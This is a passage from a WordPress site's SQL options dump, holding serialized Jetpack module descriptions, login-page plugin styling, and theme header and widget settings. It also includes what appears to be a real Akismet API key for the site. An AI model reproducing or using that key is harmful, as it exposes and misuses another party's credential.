servers.\";s:4:\"sort\";s:2:\"25\";s:20:\"recommendation_order\";s:1:\"1\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:42:\"Photos and Videos, Appearance, Recommended\";s:7:\"feature\";s:34:\"Recommended, Jumpstart, Appearance\";s:25:\"additional_search_queries\";s:38:\"photon, image, cdn, performance, speed\";}s:32:\"e37cfbcb72323fb1fe8255a2edb4d738\";a:14:{s:4:\"name\";s:13:\"Post by Email\";s:11:\"description\";s:34:\"Publish posts by sending an email.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"14\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:20:\"post by email, email\";}s:32:\"728290d131a480bfe7b9e405d7cd925f\";a:14:{s:4:\"name\";s:7:\"Protect\";s:11:\"description\";s:43:\"Prevent and block malicious login attempts.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"1\";s:20:\"recommendation_order\";s:1:\"4\";s:10:\"introduced\";s:3:\"3.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:11:\"Recommended\";s:7:\"feature\";s:8:\"Security\";s:25:\"additional_search_queries\";s:65:\"security, secure, protection, botnet, brute force, protect, login\";}s:32:\"f9ce784babbbf4dcca99b8cd2ceb420c\";a:14:{s:4:\"name\";s:9:\"Publicize\";s:11:\"description\";s:27:\"Automated social marketing.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"10\";s:20:\"recommendation_order\";s:1:\"7\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:19:\"Social, Recommended\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:107:\"facebook, twitter, google+, googleplus, google, path, tumblr, linkedin, social, tweet, connections, sharing\";}s:32:\"052c03877dd3d296a71531cb07ad939a\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"52edecb2a75222e75b2dce4356a4efce\";a:14:{s:4:\"name\";s:13:\"Related Posts\";s:11:\"description\";s:64:\"Increase page views by showing related content to your visitors.\";s:14:\"jumpstart_desc\";s:113:\"Keep visitors engaged on your blog by highlighting relevant and new content at the bottom of each published post.\";s:4:\"sort\";s:2:\"29\";s:20:\"recommendation_order\";s:1:\"9\";s:10:\"introduced\";s:3:\"2.9\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:11:\"Recommended\";s:7:\"feature\";s:21:\"Engagement, Jumpstart\";s:25:\"additional_search_queries\";s:22:\"related, related posts\";}s:32:\"68b0d01689803c0ea7e4e60a86de2519\";a:14:{s:4:\"name\";s:9:\"SEO tools\";s:11:\"description\";s:50:\"Better results on search engines and social media.\";s:14:\"jumpstart_desc\";s:50:\"Better results on search engines and social media.\";s:4:\"sort\";s:2:\"35\";s:20:\"recommendation_order\";s:2:\"15\";s:10:\"introduced\";s:3:\"4.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:18:\"Social, Appearance\";s:7:\"feature\";s:18:\"Traffic, Jumpstart\";s:25:\"additional_search_queries\";s:81:\"search engine optimization, social preview, meta description, custom title format\";}s:32:\"8b059cb50a66b717f1ec842e736b858c\";a:14:{s:4:\"name\";s:7:\"Sharing\";s:11:\"description\";s:37:\"Allow visitors to share your content.\";s:14:\"jumpstart_desc\";s:116:\"Twitter, Facebook and Google+ buttons at the bottom of each post, making it easy for visitors to share your content.\";s:4:\"sort\";s:1:\"7\";s:20:\"recommendation_order\";s:1:\"6\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:3:\"1.2\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:19:\"Social, Recommended\";s:7:\"feature\";s:21:\"Engagement, Jumpstart\";s:25:\"additional_search_queries\";s:141:\"share, sharing, sharedaddy, buttons, icons, email, facebook, twitter, google+, linkedin, pinterest, pocket, press this, print, reddit, tumblr\";}s:32:\"a6d2394329871857401255533a9873f7\";a:14:{s:4:\"name\";s:16:\"Shortcode Embeds\";s:11:\"description\";s:50:\"Embed media from popular sites without any coding.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"3\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:3:\"1.2\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:46:\"Photos and Videos, Social, Writing, Appearance\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:245:\"shortcodes, shortcode, embeds, media, bandcamp, blip.tv, dailymotion, facebook, flickr, google calendars, google maps, google+, polldaddy, recipe, recipes, scribd, slideshare, slideshow, slideshows, soundcloud, ted, twitter, vimeo, vine, youtube\";}s:32:\"21496e2897ea5f81605e2f2ac3beb921\";a:14:{s:4:\"name\";s:16:\"WP.me Shortlinks\";s:11:\"description\";s:54:\"Create short and simple links for all posts and pages.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"8\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:17:\"shortlinks, wp.me\";}s:32:\"e2a54a5d7879a4162709e6ffb540dd08\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"f5c537bc304f55b29c1a87e30be0cd24\";a:14:{s:4:\"name\";s:8:\"Sitemaps\";s:11:\"description\";s:50:\"Make it easy for search engines to find your site.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"13\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"3.9\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:6:\"Public\";s:11:\"module_tags\";s:20:\"Recommended, Traffic\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:39:\"sitemap, traffic, search, site map, seo\";}s:32:\"59a23643437358a9b557f1d1e20ab040\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"6a90f97c3194cfca5671728eaaeaf15e\";a:14:{s:4:\"name\";s:14:\"Single Sign On\";s:11:\"description\";s:46:\"Secure user authentication with WordPress.com.\";s:14:\"jumpstart_desc\";s:98:\"Lets you log in to all your Jetpack-enabled sites with one click using your WordPress.com account.\";s:4:\"sort\";s:2:\"30\";s:20:\"recommendation_order\";s:1:\"5\";s:10:\"introduced\";s:3:\"2.6\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:10:\"Developers\";s:7:\"feature\";s:19:\"Security, Jumpstart\";s:25:\"additional_search_queries\";s:34:\"sso, single sign on, login, log in\";}s:32:\"b65604e920392e2f7134b646760b75e8\";a:14:{s:4:\"name\";s:10:\"Site Stats\";s:11:\"description\";s:44:\"Collect valuable traffic stats and insights.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"1\";s:20:\"recommendation_order\";s:1:\"2\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:23:\"Site Stats, Recommended\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:54:\"statistics, tracking, analytics, views, traffic, stats\";}s:32:\"23a586dd7ead00e69ec53eb32ef740e4\";a:14:{s:4:\"name\";s:13:\"Subscriptions\";s:11:\"description\";s:55:\"Notify your readers of new posts and comments by email.\";s:14:\"jumpstart_desc\";s:126:\"Give visitors two easy subscription options — while commenting, or via a separate email subscription widget you can display.\";s:4:\"sort\";s:1:\"9\";s:20:\"recommendation_order\";s:1:\"8\";s:10:\"introduced\";s:3:\"1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:21:\"Engagement, Jumpstart\";s:25:\"additional_search_queries\";s:74:\"subscriptions, subscription, email, follow, followers, subscribers, signup\";}s:32:\"1d978b8d84d2f378fe1a702a67633b6d\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"b3b983461d7f3d27322a3551ed8a9405\";a:14:{s:4:\"name\";s:15:\"Tiled Galleries\";s:11:\"description\";s:61:\"Display image galleries in a variety of elegant arrangements.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"24\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:17:\"Photos and Videos\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:43:\"gallery, tiles, tiled, grid, mosaic, images\";}s:32:\"d924e5b05722b0e104448543598f54c0\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"36741583b10c521997e563ad8e1e8b77\";a:14:{s:4:\"name\";s:12:\"Data Backups\";s:11:\"description\";s:54:\"Off-site backups, security scans, and automatic fixes.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"32\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:5:\"0:1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:5:\"false\";s:4:\"free\";s:5:\"false\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:16:\"Security, Health\";s:25:\"additional_search_queries\";s:28:\"vaultpress, backup, security\";}s:32:\"2b9b44f09b5459617d68dd82ee17002a\";a:14:{s:4:\"name\";s:17:\"Site Verification\";s:11:\"description\";s:58:\"Establish your site\'s authenticity with external services.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"33\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"3.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:56:\"webmaster, seo, google, bing, pinterest, search, console\";}s:32:\"5ab4c0db7c42e10e646342da0274c491\";a:14:{s:4:\"name\";s:10:\"VideoPress\";s:11:\"description\";s:44:\"Powerful, simple video hosting for WordPress\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"27\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.5\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:5:\"false\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:17:\"Photos and Videos\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:25:\"video, videos, videopress\";}s:32:\"60a1d3aa38bc0fe1039e59dd60888543\";a:14:{s:4:\"name\";s:17:\"Widget Visibility\";s:11:\"description\";s:42:\"Control where widgets appear on your site.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"17\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:10:\"Appearance\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:54:\"widget visibility, logic, conditional, widgets, widget\";}s:32:\"174ed3416476c2cb9ff5b0f671280b15\";a:14:{s:4:\"name\";s:21:\"Extra Sidebar Widgets\";s:11:\"description\";s:54:\"Add images, Twitter streams, and more to your sidebar.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"4\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:18:\"Social, Appearance\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:65:\"widget, widgets, facebook, gallery, twitter, gravatar, image, rss\";}s:32:\"28b931a1db19bd24869bd54b14e733d5\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}}}','yes'),(131744,'Admin_custome_login_text','s:627:\"a:17:{s:18:\"heading_font_color\";s:7:\"#ffffff\";s:16:\"input_font_color\";s:7:\"#000000\";s:10:\"link_color\";s:7:\"#ffffff\";s:12:\"button_color\";s:7:\"#dd3333\";s:17:\"heading_font_size\";s:2:\"14\";s:15:\"input_font_size\";s:2:\"18\";s:9:\"link_size\";s:2:\"14\";s:16:\"button_font_size\";s:2:\"14\";s:18:\"enable_link_shadow\";s:3:\"yes\";s:17:\"link_shadow_color\";s:7:\"#ffffff\";s:18:\"heading_font_style\";s:9:\"Open Sans\";s:16:\"input_font_style\";s:9:\"Open Sans\";s:15:\"link_font_style\";s:9:\"Open Sans\";s:17:\"button_font_style\";s:9:\"Open Sans\";s:20:\"enable_inputbox_icon\";s:3:\"yes\";s:15:\"user_input_icon\";s:7:\"fa-user\";s:19:\"password_input_icon\";s:6:\"fa-key\";}\";','yes'),(131745,'Admin_custome_login_logo','s:267:\"a:5:{s:10:\"logo_image\";s:83:\"https://zphiblgz.org/wp-content/plugins/admin-custom-login//images/default-logo.png\";s:10:\"logo_width\";s:3:\"274\";s:11:\"logo_height\";s:2:\"63\";s:8:\"logo_url\";s:20:\"https://zphiblgz.org\";s:14:\"logo_url_title\";s:23:\"Your Site Name and Info\";}\";','yes'),(131746,'Admin_custome_login_Social','s:911:\"a:21:{s:18:\"enable_social_icon\";s:5:\"outer\";s:16:\"social_icon_size\";s:6:\"mediam\";s:18:\"social_icon_layout\";s:9:\"rectangle\";s:17:\"social_icon_color\";s:7:\"#ffffff\";s:25:\"social_icon_color_onhover\";s:7:\"#1e73be\";s:14:\"social_icon_bg\";s:7:\"#1e73be\";s:22:\"social_icon_bg_onhover\";s:7:\"#ffffff\";s:20:\"social_facebook_link\";s:19:\"http://facebook.com\";s:19:\"social_twitter_link\";s:33:\"https://twitter.com/minimalmonkey\";s:20:\"social_linkedin_link\";s:0:\"\";s:23:\"social_google_plus_link\";s:22:\"http://plus.google.com\";s:21:\"social_pinterest_link\";s:0:\"\";s:16:\"social_digg_link\";s:0:\"\";s:19:\"social_youtube_link\";s:19:\"https://youtube.com\";s:18:\"social_flickr_link\";s:18:\"https://flickr.com\";s:18:\"social_tumblr_link\";s:0:\"\";s:21:\"social_vkontakte_link\";s:0:\"\";s:17:\"social_skype_link\";s:0:\"\";s:21:\"social_instagram_link\";s:21:\"https://instagram.com\";s:20:\"social_telegram_link\";s:0:\"\";s:20:\"social_whatsapp_link\";s:0:\"\";}\";','yes'),(131747,'Admin_custome_login_Slidshow','s:967:\"a:12:{s:16:\"Slidshow_image_1\";s:82:\"https://zphiblgz.org/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_2\";s:82:\"https://zphiblgz.org/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_3\";s:82:\"https://zphiblgz.org/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_4\";s:82:\"https://zphiblgz.org/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_5\";s:82:\"https://zphiblgz.org/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:16:\"Slidshow_image_6\";s:82:\"https://zphiblgz.org/wp-content/plugins/admin-custom-login//images/rpg-default.jpg\";s:22:\"Slidshow_image_label_1\";s:9:\"undefined\";s:22:\"Slidshow_image_label_2\";s:9:\"undefined\";s:22:\"Slidshow_image_label_3\";s:9:\"undefined\";s:22:\"Slidshow_image_label_4\";s:9:\"undefined\";s:22:\"Slidshow_image_label_5\";s:9:\"undefined\";s:22:\"Slidshow_image_label_6\";s:9:\"undefined\";}\";','yes'),(131748,'Admin_custome_login_gcaptcha','s:91:\"a:3:{s:8:\"site_key\";s:0:\"\";s:10:\"secret_key\";s:0:\"\";s:21:\"login_enable_gcaptcha\";s:2:\"no\";}\";','yes'),(2307,'theme_my_login_themed_profiles','a:8:{s:13:\"administrator\";a:2:{s:13:\"theme_profile\";b:1;s:14:\"restrict_admin\";b:0;}s:6:\"author\";a:2:{s:13:\"theme_profile\";b:1;s:14:\"restrict_admin\";b:0;}s:11:\"contributor\";a:2:{s:13:\"theme_profile\";b:1;s:14:\"restrict_admin\";b:0;}s:8:\"customer\";a:2:{s:13:\"theme_profile\";b:1;s:14:\"restrict_admin\";b:0;}s:6:\"editor\";a:2:{s:13:\"theme_profile\";b:1;s:14:\"restrict_admin\";b:0;}s:12:\"shop_manager\";a:2:{s:13:\"theme_profile\";b:1;s:14:\"restrict_admin\";b:0;}s:5:\"staff\";a:2:{s:13:\"theme_profile\";b:1;s:14:\"restrict_admin\";b:0;}s:10:\"subscriber\";a:2:{s:13:\"theme_profile\";b:1;s:14:\"restrict_admin\";b:0;}}','yes'),(2276,'akismet_show_user_comments_approved','0','yes'),(2277,'wordpress_api_key','0551b927c83f','yes'),(1716,'category_children','a:0:{}','yes'),(132,'_transient_twentysixteen_categories','1','yes'),(133,'theme_mods_twentysixteen','a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1480436952;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}}}}','yes'),(134,'current_theme','Hopeful','yes'),(135,'theme_mods_hopeful','a:3:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:49;}s:18:\"custom_css_post_id\";i:-1;}','yes'),(136,'theme_switched','','yes'),(137,'post_settings_defaults','a:10:{s:10:\"hide_title\";s:2:\"no\";s:9:\"hide_meta\";s:2:\"no\";s:12:\"hide_related\";s:2:\"no\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:2:\"no\";s:15:\"hide_author_box\";s:3:\"yes\";s:14:\"background_img\";s:0:\"\";s:19:\"background_position\";s:4:\"left\";s:14:\"title_position\";s:5:\"below\";s:8:\"subtitle\";s:0:\"\";}','yes'),(138,'page_settings_defaults','a:7:{s:10:\"hide_title\";s:2:\"no\";s:9:\"hide_meta\";s:3:\"yes\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:2:\"no\";s:15:\"hide_author_box\";s:3:\"yes\";s:14:\"background_img\";s:0:\"\";s:19:\"background_position\";s:4:\"left\";}','yes'),(139,'widget_widget_touchsize_most_liked','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(140,'widget_widget_touchsize_list_events','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(141,'widget_widget_touchsize_most_viewed','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(142,'widget_widget_touchsize_tweets','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(143,'widget_widget_touchsize_flickrwidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(144,'widget_widget_touchsize_instagram','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(145,'widget_widget_touchsize_tags','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(146,'widget_widget_touchsize_custom_post','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(147,'widget_widget_touchsize_comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(148,'widget_widget_touchsize_latestposts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(149,'widget_widget_touchsize_facebook','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(150,'hopeful_header','a:1:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"left\";s:13:\"bgAttachement\";s:5:\"fixed\";s:8:\"bgRepeat\";s:6:\"repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:2:\"40\";s:13:\"rowPaddingTop\";s:2:\"40\";s:16:\"rowPaddingBottom\";s:2:\"40\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:3:{i:0;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:0:{}}i:1;a:2:{s:4:\"size\";i:9;s:8:\"elements\";a:1:{i:0;a:15:{s:4:\"type\";s:4:\"menu\";s:13:\"element-style\";s:6:\"style1\";s:11:\"menu-custom\";s:2:\"no\";s:13:\"menu-bg-color\";s:7:\"#DDDDDD\";s:15:\"menu-text-color\";s:7:\"#FFFFFF\";s:19:\"menu-bg-color-hover\";s:7:\"#DDDDDD\";s:21:\"menu-text-color-hover\";s:7:\"#FFFFFF\";s:16:\"submenu-bg-color\";s:7:\"#DDDDDD\";s:18:\"submenu-text-color\";s:7:\"#FFFFFF\";s:22:\"submenu-bg-color-hover\";s:7:\"#DDDDDD\";s:24:\"submenu-text-color-hover\";s:7:\"#FFFFFF\";s:15:\"menu-text-align\";s:20:\"menu-text-align-left\";s:11:\"admin-label\";s:0:\"\";s:9:\"uppercase\";s:17:\"menu-no-uppercase\";s:4:\"name\";s:2:\"49\";}}}i:2;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:0:{}}}}}','yes'),(151,'hopeful_header_template_id','default','yes'),(152,'hopeful_header_templates','a:1:{s:7:\"default\";a:2:{s:4:\"name\";s:16:\"Default template\";s:8:\"elements\";a:1:{i:0;a:2:{s:8:\"settings\";a:25:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"left\";s:13:\"bgAttachement\";s:5:\"fixed\";s:8:\"bgRepeat\";s:6:\"repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:2:\"40\";s:13:\"rowPaddingTop\";s:2:\"40\";s:16:\"rowPaddingBottom\";s:2:\"40\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:2:{i:0;a:2:{s:4:\"size\";i:4;s:8:\"elements\";a:1:{i:0;a:2:{s:4:\"type\";s:4:\"logo\";s:10:\"logo-align\";s:9:\"text-left\";}}}i:1;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:1:{i:0;a:14:{s:4:\"type\";s:4:\"menu\";s:13:\"element-style\";s:6:\"style1\";s:11:\"menu-custom\";s:2:\"no\";s:13:\"menu-bg-color\";s:7:\"#D